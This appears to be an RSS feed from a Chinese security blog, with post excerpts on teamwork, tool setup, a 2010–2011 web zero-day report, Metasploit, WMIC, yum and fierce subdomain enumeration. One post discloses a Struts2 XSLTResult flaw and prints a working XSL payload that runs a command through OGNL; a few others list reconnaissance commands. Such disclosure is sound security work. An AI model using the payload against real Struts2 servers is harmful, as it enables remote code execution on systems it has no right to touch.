<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>艾米网络</title>
	<atom:link href="http://www.imiyoo.com/blog/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.imiyoo.com/blog</link>
	<description>关注网络安全 致力移动平台(Android) 修炼入侵渗透</description>
	<lastBuildDate>Thu, 01 Mar 2012 07:18:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>为团队努力</title>
		<link>http://www.imiyoo.com/blog/?p=541</link>
		<comments>http://www.imiyoo.com/blog/?p=541#comments</comments>
		<pubDate>Thu, 01 Mar 2012 07:12:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[随感而发]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=541</guid>
		<description><![CDATA[每个人都会渴望得到别人的认同，当别人认同你的时候，你就应该努力去认同别人。 好久没弄博客，今天就随便写写吧，感觉有些东西的变化可能是潜移默化，也确实印证了我最自己的一句话，其实每个人都是有很多潜在的能力，而这些能力只有你处的环境才能激发。在最近一段时间的工作里，自己也发生了很多的变化，让我越来越深刻的了解到，要想获得成功，必须得付出足够多的努力，一步一步的走，成功是没有捷径的。只有当你为一件事情付出得足够多，考虑得足够多的时候，才会从量变往质变进行转变；考虑问题的角度和高度才会升华，而且有些话的意思虽然很好明白，只有当你真正处在那个环境的时候，你才会有特别的感受。今天突然冒出的一些想法，记录一下: &#160; 1 团队的组建和培养 一个人能做的事可以很多，但远远不够一个团队;团队也是需要磨练，需要成长，一个人在想为团队的付出的时候，他产生的价值是一个团队，推动的是一个团队；而一个人在为自己付出的时候，他产生的价值却只有自己； 必须的培训机制(整体技术能力的提升) 必须的想法沟通(凝聚力的加强) 必须的监督机制(必要的约束环境) 切记勿成为团队的瓶颈，任务一定要协同或分发 &#160; 2 坚定的执行力和换位思考 任务计划制度，同时每天进行必要的分享，一件事要么不做，要么做到最好。 &#160; 3 集中精力做最有意义的事 其实可以做的事情很多，但是不是每件事情都需要做呢，当然不是，对事情的价值需要有清晰的判断，不过判断的时间必须可控，需要在可控时间做出必要的决定，同时永远选取价值最大化的事情为切入点。]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=541</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DNS协议传输过程的脆弱点</title>
		<link>http://www.imiyoo.com/blog/?p=537</link>
		<comments>http://www.imiyoo.com/blog/?p=537#comments</comments>
		<pubDate>Tue, 27 Dec 2011 03:18:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[工作记录]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=537</guid>
		<description><![CDATA[]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=537</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>用source insight 看python源代码</title>
		<link>http://www.imiyoo.com/blog/?p=535</link>
		<comments>http://www.imiyoo.com/blog/?p=535#comments</comments>
		<pubDate>Mon, 14 Nov 2011 02:23:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[工作记录]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=535</guid>
		<description><![CDATA[1：下载si的一个CLF文件(for python)下载地址：http://www.sourceinsight.com/public/languages/Python.CLF 2：open si，选择options-&#62;Preferences-&#62;Language-&#62;import-&#62;将刚刚的clf文件导入进来，然后OK 3：options-&#62;Document options-&#62;Language选择python，再new 一个type，里面输入python，然后在file filter中输入：*.py，OK ]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=535</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>2010-2011 WEB 零日漏洞安全报告</title>
		<link>http://www.imiyoo.com/blog/?p=532</link>
		<comments>http://www.imiyoo.com/blog/?p=532#comments</comments>
		<pubDate>Mon, 24 Oct 2011 12:36:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[工作记录]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=532</guid>
		<description><![CDATA[本期报告概要： 2010年1月12日上午7点钟开始，全球最大中文搜索引擎百度”遭到黑客攻击，长时间无法正常访问。这是自百度建立以来，所 遭遇的持续时间最长、影响最严重的黑客攻击。回顾2010年，猖獗的WEB 零日漏洞攻击似乎预示着，2011年又将是一个WEB 零日漏洞活跃的年份。 各种安全漏洞的传播仍将继续扩大，僵尸网络还将活跃并更加频繁变换方位，而黑客也将继续绞尽脑汁发明新的方式，以试图逃过各种安全软件的过滤。为此，杭州 安恒信息技术有限公司攻防实验室结合自身研究成果总结并发布2010-2011 Web 零日漏洞安全报告，从而呼吁整个互联网关注Web时代信息安全的全新威胁及趋势走向。 本期报告主要内容： 2010-2011Web安全事件回顾 2010-2011Web 0day回放 Web安全未来发展趋势与挑战 2010-2011Web安全事件回顾： 2011-3月MYSQL.com和sun.com被入侵 攻击者通过MySQL.com上查看用户的页面进入，获取到了数据库、表及存储用户密码的dump数据。更严重的是，攻击者将用户密码数据公布在网上让其他人进行破解。更糟糕的是MySQL产品负责人的密码已被破解（竟然是4位数字：安全意识）。 2011-4月，索尼数据服务器被入侵 日本索尼公司5月1日在东京举行新闻发布会，就公司网络游戏用户个人信息遭窃一事表示道歉，承认1000万张信用卡资料可能外泄，已邀请美国联邦调查局(FBI)展开调查。 2011-6月Google Gmail邮箱被攻击 当Gmail用户打开带有Flash漏洞攻击代码的恶意网页时，Gmail邮箱中将被黑客偷偷添加一个“间谍”帐户。这个“间谍”帐户不仅可以阅读所有邮件，甚至还能冒充Gmail邮箱的主人向外发送邮件，从而使黑客达到发布恶意广告、欺诈信息等目的。 Flash被广泛应用在网页视频、网页游戏等领域，国内几乎90%以上的电脑都安装了Adobe Flash Player。同时，Gmail在国内也拥有大量忠诚用户。因此，Flash“间谍”漏洞的曝光将对Gmail邮箱安全造成极大威胁。 2011-6月新浪微博遭黑客攻击 图片为引入的蠕虫JS文件： 6月28日晚，许多新浪微博用户的微博账号突然间大爆发，短时间内发布了多条带有短链接的微博并对粉丝发同类私信。这其中不乏 加V认证的用户。而粉丝们收到该微博内容后，受微博或私信中诱惑性文字的诱导，点击该链接后，这一批用户也遭受感染，进行批量发布带有恶意短链接的微博。 据分析，此次新浪微博大范围遭受XSS攻击，主要原因是新浪微博的名人堂过滤不严，导致执行跨站脚本。当用户点击该恶意链接后，蠕虫病毒就通过这些用户继 续的进行传播，通过执行脚本，令受感染的微博帐号发布如下带有诱惑性字样的微博正文，并附上短链接： 郭美美事件的一些未注意到的细节； 建党大业中穿帮的地方； 让女人心动的100句诗歌； 3D肉团团高清普通话版种子； 这是传说中的神仙眷侣啊； 惊爆！范冰冰艳照真流出了； 杨幂被爆多次被潜规则； 傻仔拿锤子去抢银行； 可以监听别人手机的软件； 个税起征点有望提到4000。 以上均为当前热门话题，对用户很具有诱导性。尤其是众多加V认证的用户受到感染，发布相关微博内容后，病毒传播的途径更为广泛，影响更为严重。在不到一个小时的时间，已经有超过3万用户中招。 &#160; 2010-2011Web 0day回放： 2010-5月nginx文件类型错误解析漏洞 漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以 location ~ \.php$ { root html; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=532</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>struts2框架XSLTResult本地文件代码执行漏洞</title>
		<link>http://www.imiyoo.com/blog/?p=523</link>
		<comments>http://www.imiyoo.com/blog/?p=523#comments</comments>
		<pubDate>Sat, 27 Aug 2011 07:38:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Web漏洞]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=523</guid>
		<description><![CDATA[这是个没有人公布过的漏洞，偶尔看代码发现的。事实上，这段代码用的人不多，需要同时满足两个情况，才可以搞。我猜测，发出struts2远程代码执行的那个大牛，不可能没发现这么弱智的漏洞。所以，要么是有原因不能公布，要么就是卖了，那就好，这次我首发，哈哈哈！ 先讲讲原理： struts2允许action有多种返回类型，其中包括XSLT类型，这种类型允许接受用户提交一个文件地址，并且去解析它为XSLT文件，无论扩展名是什么。 这是XSLTResult文件代码： http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java //获取用户提交的"xslt.location"的值 String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location"); path = pathFromRequest; URL resource = ServletActionContext.getServletContext().getResource(path); //解析用户提交的文件地址为xslt templates = factory.newTemplates(new StreamSource(resource.openStream())); 而XSLT解析，会允许执行java静态方法，所以，只要上传一个文件在服务器上，例如 /upload/7758521.gif： &#60;?xml version="1.0" encoding="UTF-8" ?&#62; &#60;xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0" xmlns:ognl="ognl.Ognl"&#62; &#60;xsl:template match="/"&#62; &#60;html&#62; &#60;body&#62; &#60;h2&#62;hacked by kxlzx&#60;/h2&#62; &#60;h2&#62;http://www.inbreak.net&#60;/h2&#62; &#60;exp&#62; &#60;xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&#38;quot;calc&#38;quot;)', '')"/&#62; &#60;/exp&#62; &#60;/body&#62; &#60;/html&#62; &#60;/xsl:template&#62; &#60;/xsl:stylesheet&#62; 这个xsl文件解析时，会调用ognl中的： ognl:getValue('@Runtime@getRuntime().exec("calc")', '') 导致执行任意代码。 事实上，XSLT解析，可以执行任意代码，并非只是java的，php也可以，只是大多数人不注意罢了，我在之前，还看到很多关于XSLT执行代码的文章，当然不是为了安全研究。 可能这个知识点知道的不多，导致没有人发现struts2这个明显的安全问题。]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=523</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit使用Mysql</title>
		<link>http://www.imiyoo.com/blog/?p=500</link>
		<comments>http://www.imiyoo.com/blog/?p=500#comments</comments>
		<pubDate>Thu, 28 Jul 2011 06:19:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技能学习]]></category>
		<category><![CDATA[msf mysql driver ruby]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=500</guid>
		<description><![CDATA[之前一直都是在BT4上使用msf，最近因为需要想在Debian上安装个最新的Metasploit，装上去发现Mysql数据库死活就是连接不上，发现网上也有很多人遇到这个问题，但都没有给出解决办法。 最后找了很多资料总算解决，主要是由于ruby的版本与使用的mysql驱动不配，正常使用apt-get会安装最新的ruby,而msf是按照旧版本驱动的使用模式，因此需要执行下面的命令，降低ruby版本: 1 .update-alternatives &#8211;config ruby 2 .ruby -v #make sure you are running ruby 1.8.7 3 .gem install mysql 执行完上面的操作，这时候msf就能正常连接上Mysql数据库库了]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=500</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WMIC常用命令</title>
		<link>http://www.imiyoo.com/blog/?p=498</link>
		<comments>http://www.imiyoo.com/blog/?p=498#comments</comments>
		<pubDate>Mon, 18 Jul 2011 05:43:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技能学习]]></category>
		<category><![CDATA[WMIC]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=498</guid>
		<description><![CDATA[感觉WMIC的命令比CMD下的命令好用多了，方便批处理处理东西，记录一下。 1. wmic /node:”192.168.1.20&#8243; /user:”domain\administrator” /password:”123456&#8243; 2.【硬件管理】： 获取磁盘资料： wmic DISKDRIVE get deviceid,Caption,size,InterfaceType 获取分区资料： wmic LOGICALDISK get name,Description,filesystem,size,freespace 获取CPU资料: wmic cpu get name,addresswidth,processorid 获取主板资料: wmic BaseBoard get Manufacturer,Product,Version,SerialNumber 获取内存数: wmic memlogical get totalphysicalmemory 获得品牌机的序列号: wmic csproduct get IdentifyingNumber 获取声卡资料: wmic SOUNDDEV get ProductName 获取屏幕分辨率 wmic DESKTOPMONITOR where Status=&#8217;ok&#8217; get ScreenHeight,ScreenWidth 3. PROCESS【进程管理】： 列出进程 wmic process list]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=498</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CentOS中yum的命令列表</title>
		<link>http://www.imiyoo.com/blog/?p=492</link>
		<comments>http://www.imiyoo.com/blog/?p=492#comments</comments>
		<pubDate>Thu, 14 Jul 2011 12:35:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技能学习]]></category>
		<category><![CDATA[centos yum]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=492</guid>
		<description><![CDATA[1.列出任何可更新的软件清单 命令：yum check-update 2.安装任何更新软件 命令：yum update 3.仅安装指定的软件 命令：yum install *** 4.仅更新指定的软件 命令：yum update *** 5.列出任何可安裝的软件清单 命令：yum list 用YUM安装删除软件 装了系统添加删除软件是常事，yum同样能够胜任这一任务，只要软件是rpm安装的。安装的命令是，yum install xxx，yum会查询数据库，有无这一软件包，假如有，则检查其依赖冲突关系，假如没有依赖冲突，那么最好，下载安装;假如有，则会给出提示，询问是否要同时安装依赖，或删除冲突的包，您能够自己作出判断。删除的命令是，yum remove xxx，同安装相同，yum也会查询数据库，给出解决依赖关系的提示。 1.用YUM安装软件包 命令：yum install *** 2.用YUM删除软件包 命令：yum remove *** 用YUM查询软件信息 我 们常会碰到这样的情况，想要安装一个软件，只知道他和某方面有关，但又不能确切知道他的名字。这时yum的查询功能就起作用了。您能够用 yum search keyword这样的命令来进行搜索，比如我们要则安装一个Instant Messenger，但又不知到底有哪些，这时不妨用 yum search messenger这样的指令进行搜索，yum会搜索任何可用rpm的描述，列出任何描述中和messeger有关的rpm包，于 是我们可能得到gaim，kopete等等，并从中选择。有时我们还会碰到安装了一个包，但又不知道其用途，我们能够用yum info packagename这个指令来获取信息。 1.使用YUM查找软件包 命令：yum search *** 2.列出任何可安装的软件包 命令：yum list 3.列出任何可更新的软件包 命令：yum list updates]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=492</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>查询当前域的所有子域名</title>
		<link>http://www.imiyoo.com/blog/?p=488</link>
		<comments>http://www.imiyoo.com/blog/?p=488#comments</comments>
		<pubDate>Thu, 19 May 2011 06:12:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技能学习]]></category>
		<category><![CDATA[如何 查询 子域名]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=488</guid>
		<description><![CDATA[fierce的原理还是根据字典来进行匹配查询当前域下的子域名，消费的时间长，结果不会太完善，但作为一种信息收集的方法，记录一下&#8230;.. 查子域名语句:perl fierce.pl -dns baidu.com -wide 其他一些命令: perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts 我们目标DNS是widget.com发现其还管理着nutsandbolts网站,并且存在@widgetcompany的邮箱后缀,通过-search能够查询到相关信息 perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com 查询内网域,定制一个DNSSERVER perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt 可以连接一个HTTP头文件对目标进行Http Head Injection 不过用处不大,耗时 perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt 可以自己定制二级域名的字典来进行查询]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=488</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apache不能加载php_exif.dll模块的解决</title>
		<link>http://www.imiyoo.com/blog/?p=483</link>
		<comments>http://www.imiyoo.com/blog/?p=483#comments</comments>
		<pubDate>Thu, 12 May 2011 03:19:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技能学习]]></category>
		<category><![CDATA[php_exif.dll php_mbstring.dll]]></category>

		<guid isPermaLink="false">http://www.imiyoo.com/blog/?p=483</guid>
		<description><![CDATA[Apache或IIS中，如果按照默认php.ini，会无法加载php_exif.dll模块 想php_exif能够被成功加载，必须满足下面条件： 1. php_mbstring被启用； 2. php.ini中，php_mbstring必须在php_exif前被加载。 因此需要修改默认的php.ini中的这两个模块顺序(默认是字典序) extension=php_mbstring.dll extension=php_exif.dll]]></description>
		<wfw:commentRss>http://www.imiyoo.com/blog/?feed=rss2&#038;p=483</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

